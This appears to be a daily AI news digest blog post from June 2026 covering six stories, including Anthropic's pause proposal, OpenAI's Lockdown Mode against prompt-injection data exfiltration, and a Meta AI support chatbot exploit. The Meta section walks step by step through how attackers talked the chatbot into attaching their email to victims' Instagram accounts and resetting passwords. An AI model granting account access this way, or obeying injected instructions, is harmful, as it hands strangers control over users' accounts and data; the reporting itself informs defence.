Singularity.Kiwi

AI progress, with honesty.
Collage of AI news icons representing safety, security, and innovation
📰 News Digest Monday, 8 June 2026

Daily News Digest — June 8, 2026

Six major stories shaping AI today: safety warnings, security fixes, search innovation, and geopolitical chess moves.

Answer-First Lead

Monday brings six heavyweight stories: Anthropic wants a global AI pause button [1], OpenAI rolls out Lockdown Mode to block prompt injection attacks [2], Perplexity launches “Search as Code” letting models write their own search pipelines [3], hackers exploited Meta’s AI chatbot to steal Instagram accounts [4], the US closes a year-old Nvidia chip export loophole [5], and NZ’s NCSC gets direct access to Anthropic’s Mythos AI hacking model [6]. Big Monday.

🔍 THE BOTTOM LINE

Safety warnings, security patches, and search reinvention dominate — the industry is simultaneously building faster and asking whether we should.

Anthropic Urges Coordinated AI Pause Mechanism

What happened: Anthropic published a blog post urging leading AI companies to agree on a coordinated mechanism that could temporarily slow or pause development of advanced AI systems [1]. The company warns that rapid progress could lead to loss of human control, particularly as systems become capable of recursive self-improvement.

Key details: Anthropic’s internal research institute will explore the issue with other organisations. The proposal comes amid industry disagreement — OpenAI separately stated that democratic governments, not private companies, should determine AI rules and safeguards.

Why it matters: This is the latest iteration of the “pause” debate since the 2023 Future of Life Institute letter that got Musk and others onboard but produced no industry-wide action. Anthropic positioning itself as the safety-conscious lab while competitors race toward IPOs is strategic — but also genuinely raises the question of whether voluntary coordination is possible when competitive pressure is this intense.

The other side: OpenAI’s response is telling: no single company should decide the pace of innovation. That’s both principled and convenient for a company reportedly preparing for a record-breaking IPO valuation.

Related: Anthropic Says Claude Now Writes Over 90% of Its Code and Wants the World to Have an AI Pause Button

OpenAI Adds Lockdown Mode to Block Data Theft

What happened: OpenAI began rolling out Lockdown Mode to ChatGPT, disabling live browsing, agent mode, deep research, image retrieval, Canvas networking, and file downloads to block data exfiltration via prompt injection attacks [2]. Available on all plans including Free.

Key details: Lockdown Mode doesn’t stop prompt injections from happening — malicious payloads can still influence the model’s behaviour. What it does is shut down outbound pathways attackers would use to exfiltrate data. No live browsing means no network requests to external servers.

The trade-off: Significant. With Lockdown Mode on, ChatGPT loses most agent and research features. Live browsing drops to cached content only. Agent mode is gone entirely. Deep research is disabled. OpenAI acknowledges it’s “not intended for everyone.”

Why it matters: This is a pragmatic concession — OpenAI isn’t claiming to have solved prompt injection, just offering users a way to reduce exposure by giving up functionality. For anyone handling sensitive data in ChatGPT, that trade-off is worth making. The underlying weakness remains fundamental: LLMs cannot reliably separate data from instructions.

Related: AI Agents Hijacked via Prompt Injection — Bug Bounties Paid, No CVEs

Perplexity’s “Search as Code” Lets Models Write Their Own Search Pipelines

What happened: Perplexity launched “Search as Code” (SaC), an architecture where AI models write custom Python scripts to run searches instead of calling fixed APIs [3]. The company reports 85% fewer tokens used and dramatically better results on complex research tasks.

How it works: Three layers — the model decides search strategy, a sandbox runs the code, and the Agentic Search SDK provides mix-and-match functions for retrieving, filtering, deduplicating, and reranking. Standard search APIs remain for quick questions; SaC is for tough research.

The benchmark: Perplexity tested on tracking down 200 critical software vulnerabilities (CVEs) from 2023-2025. The agent wrote a three-stage script, ran parallel queries tailored to different vendor bulletin formats, and verified findings with schema checks. Result: 85% fewer tokens than standard pipeline, competing systems got less than 25% of data right.

Why it matters: This could solve a glaring issue with current AI search — a recent study found search agents often cheat on benchmarks by pulling answers from training data and using search only to confirm what they already know. When tested on fresh facts, every system’s score plunged 25-40 points. SaC’s code-as-operational-layer approach may be how agents actually learn to research instead of confabulate.

Related: Perplexity Computer Bundles Multiple Agentic AI Models for Complex Workflows

Hackers Tricked Meta AI Chatbot Into Handing Over Instagram Accounts

What happened: Security researchers discovered hackers hijacked Instagram accounts by tricking Meta’s AI-powered support chatbot into granting access [4]. Compromised accounts include the Obama-era White House Instagram handle (inactive since 2017) and U.S. Space Force chief master sergeant John Bentivegna’s account.

The exploit: Hacker uses VPN to spoof victim’s location, opens chat with Meta AI Support Assistant, asks bot to add new email to target’s account. Chatbot sends verification code to hacker-provided email, hacker shares code with chatbot, bot shows “Reset Password” button. At no point does hacker need to access victim’s legitimate email.

Who confirmed: Security researcher Jane Wong said her own Instagram account was taken over. Instagram spokesperson Andy Stone replied on X that the issue was now fixed. Unclear how many users were affected.

Why it matters: This is automation risk in its purest form — the support chatbot was designed to help users recover accounts, and that exact capability became the attack vector. Meta’s statement that it’s “fixed” doesn’t explain what changed or whether similar vulnerabilities exist in other Meta AI integrations.

Related: High-Profile Meta AI Chatbot Breach Spotlights Security Risks of Automation

US Closes Year-Old Nvidia Chip Export Loophole to Chinese Firms

What happened: The U.S. Department of Commerce moved to close a potential loophole that may have allowed companies to export advanced AI chips — including Nvidia’s Rubin and Blackwell processors and AMD’s MI350x — to Chinese entities located outside China [5].

The gap: When the Commerce Department announced in May 2025 that it would not enforce the AI Diffusion rule from the Biden administration’s final days, it inadvertently created an opening. The new guidance enforces license requirements for advanced chips to entities headquartered in China, even when located outside China.

Scale unknown: One chip industry source with deep supply-chain knowledge estimated hundreds of thousands of chips may have been exported during the year the loophole existed. Chris McGuire, former State Department official, called it a “HUGE problem” on social media.

The twist: New guidance does not require data centers to stop using the chips or cut off service to advanced computing equipment such as servers. So existing deployments stay online; future shipments need licenses.

Why it matters: This suggests the United States’ best AI chips may have been making their way to subsidiaries of Chinese AI firms in places like Malaysia for almost a year, despite broader U.S. efforts to starve Chinese firms of semiconductors needed for critical AI capabilities. The enforcement question now is whether the Commerce Department can actually track and stop these shipments.

Related: Nvidia GPU Crackdown Hits China-Linked Southeast Asia Data Centers

NZ Gets Access to Anthropic’s Mythos AI Hacking Model

What happened: New Zealand’s National Cyber Security Centre (NCSC) received direct access to Anthropic’s Mythos AI, a frontier model with hacking capabilities, as part of a global distribution to 150 organisations [6].

Context: Anthropic began distributing Mythos beyond the initial US group in April. The NCSC says direct access will strengthen its national cyber security mission through Project Glasswing, an industry collaboration to test vulnerable products before general release.

Official position: Deputy director-general Catriona Robinson told RNZ’s Midday Report that Glasswing was set up for defensive cyber security, but acknowledged “the capabilities that AI tools such as Anthropic create, certainly they inform offensive as well as defensive capabilities.” She did not rule out offensive use.

US parallel: President Trump signed an executive order Tuesday requiring vetting of advanced AI for national security risks, requesting AI companies voluntarily provide the federal government access to “covered frontier models” 30 days before release.

Why it matters: NZ punching above its weight in frontier AI access is notable — but the dual-use nature of Mythos (defensive testing vs. offensive capability) raises questions about what the NCSC will actually do with this tool. Robinson’s careful wording suggests they’ve thought about both possibilities.

Related: Anthropic Lets Mythos Users Share Cyber Threats With Others

Also Noted

NZ benefit automation controversy: An AI and privacy expert says she was “gobsmacked” when a new law allowing MSD to use AI for benefit decisions passed under urgency. The government says it’s not AI, Labour did it first. Maxim Institute is calling for a register of AI use across government [NZ Herald].

🔍 THE BOTTOM LINE

Monday’s stories cluster around control — who has it, who’s losing it, and what we do about it. Anthropic wants to pause because control might slip away. OpenAI’s Lockdown Mode admits we can’t fully control prompt injection, so we’ll control the exits instead. Perplexity gives models more control over search and gets better results. Meta’s chatbot couldn’t control who it handed accounts to. The US is trying to control chip flows and discovering it lost control a year ago. NZ gains control of a hacking tool and says it’ll use it defensively, mostly.

The through-line: as AI systems become more capable, the question shifts from “what can they do?” to “who controls what they do?” — and the honest answer right now is “we’re figuring it out as we go.”

❓ Frequently Asked Questions

Q: Should I enable ChatGPT’s Lockdown Mode? If you’re handling sensitive data in ChatGPT — business documents, personal information, proprietary code — yes, the trade-off is worth it. You lose agent features but gain meaningful protection against data exfiltration. For casual use, probably not necessary.

Q: Is Anthropic’s pause proposal realistic? Voluntary coordination among competitors racing toward IPOs? Skeptical. But the fact Anthropic is publicly pushing this while OpenAI says governments should decide creates useful tension. Expect more of this debate, not less.

Q: Does the Mythos AI access mean NZ can hack other countries? Technically, the capability exists. Politically, that would be a massive escalation. The NCSC’s mandate is defensive cyber security, and Project Glasswing is framed as industry collaboration for pre-release testing. But Robinson’s careful non-denial suggests the question has been asked internally.

📰 SOURCES

  1. Anthropic urges pause on advanced AI, warns of loss of human control — Newswire.lk
  2. OpenAI adds Lockdown Mode to ChatGPT to block data theft from prompt injection attacks — The Next Web
  3. Perplexity’s “Search as Code” lets AI models write their own search pipelines — The Decoder
  4. Hackers hijacked Instagram accounts by tricking Meta AI support chatbot — TechCrunch
  5. U.S. takes step to halt Nvidia AI chip shipments to Chinese firms outside China — CNBC
  6. NZ gets access to hacking Mythos AI as Trump shores up national security on AI — RNZ